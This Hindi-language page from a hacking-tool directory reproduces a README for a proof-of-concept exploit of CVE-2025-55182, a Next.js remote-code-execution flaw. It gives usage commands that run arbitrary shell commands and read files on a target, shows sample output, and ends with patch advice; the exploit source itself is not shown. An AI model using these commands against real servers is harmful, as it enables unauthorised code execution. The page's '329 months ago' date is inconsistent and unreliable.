Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो RSC अनुरोधों में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से Next.js RCE कमजोरी है। इसमें एक Go-आधारित POC स्क्रिप्ट और सुरक्षा अनुसंधान और शिक्षा के लिए एक कमजोर टेस्ट सर्वर शामिल है। | Kitploit
उपकरण/GitHubGitHub/hoosin/cve-2025-55182
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhoosin/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो RSC अनुरोधों में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से Next.js RCE कमजोरी है। इसमें एक Go-आधारित POC स्क्रिप्ट और सुरक्षा अनुसंधान और शिक्षा के लिए एक कमजोर टेस्ट सर्वर शामिल है।

रिपॉजिटरी देखें
329 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 Next.js RCE पुनरुत्पादन मार्गदर्शिका

अस्वीकरण

⚠️ यह उपकरण केवल सुरक्षा अनुसंधान और शैक्षिक उपयोग के लिए है। कृपया अवैध उद्देश्यों के लिए उपयोग न करें। ⚠️

भेद्यता परिचय

CVE-2025-55182 Next.js फ्रेमवर्क में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। यह भेद्यता Next.js द्वारा React Server Components (RSC) अनुरोधों को संसाधित करते समय असुरक्षित डिसीरियलाइज़ेशन समस्या से उत्पन्न होती है। हमलावर दुर्भावनापूर्ण HTTP अनुरोध बनाकर, बिना प्राधिकरण के सर्वर पर मनमाना कोड निष्पादित कर सकते हैं।

प्रभावित संस्करण:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • और कुछ Canary संस्करण

वातावरण सेटअप

यह प्रोजेक्ट एक कमजोर Next.js परीक्षण सर्वर test-server प्रदान करता है।

1. परीक्षण सर्वर प्रारंभ करें

सुनिश्चित करें कि आपने Node.js और npm स्थापित किया है।

root@kitploit:~
cd test-server
npm install
npm run dev

सर्वर डिफ़ॉल्ट रूप से पर चलता है।

http://localhost:3000

नोट: यदि लॉक फ़ाइल त्रुटि होती है, तो निम्न चलाने का प्रयास करें:

root@kitploit:~
rm -f .next/dev/lock && npm run dev

भेद्यता पुनरुत्पादन (POC)

यह प्रोजेक्ट Go भाषा में POC स्क्रिप्ट poc.go प्रदान करता है।

Go स्क्रिप्ट का उपयोग

उपयोग:

root@kitploit:~
go run poc.go [लक्ष्य URL] [निष्पादित करने का आदेश]

उदाहरण:

  1. id कमांड निष्पादित करें (डिफ़ॉल्ट)

    root@kitploit:~
    go run poc.go
    

    या

    root@kitploit:~
    go run poc.go http://localhost:3000 id
    
  2. वर्तमान निर्देशिका फ़ाइलें देखें

    root@kitploit:~
    go run poc.go http://localhost:3000 "ls -la"
    
  3. फ़ाइल सामग्री देखें

    root@kitploit:~
    go run poc.go http://localhost:3000 "cat package.json"
    

अपेक्षित आउटपुट: हालाँकि HTTP स्थिति कोड 500 लौटाता है, कमांड निष्पादन परिणाम प्रतिक्रिया के digest फ़ील्ड में शामिल होगा।

root@kitploit:~
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

सुधार सुझाव

Next.js को सुरक्षित संस्करण में अपग्रेड करें:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
root@kitploit:~
npm install next@latest react@latest react-dom@latest
टूल डाउनलोड करें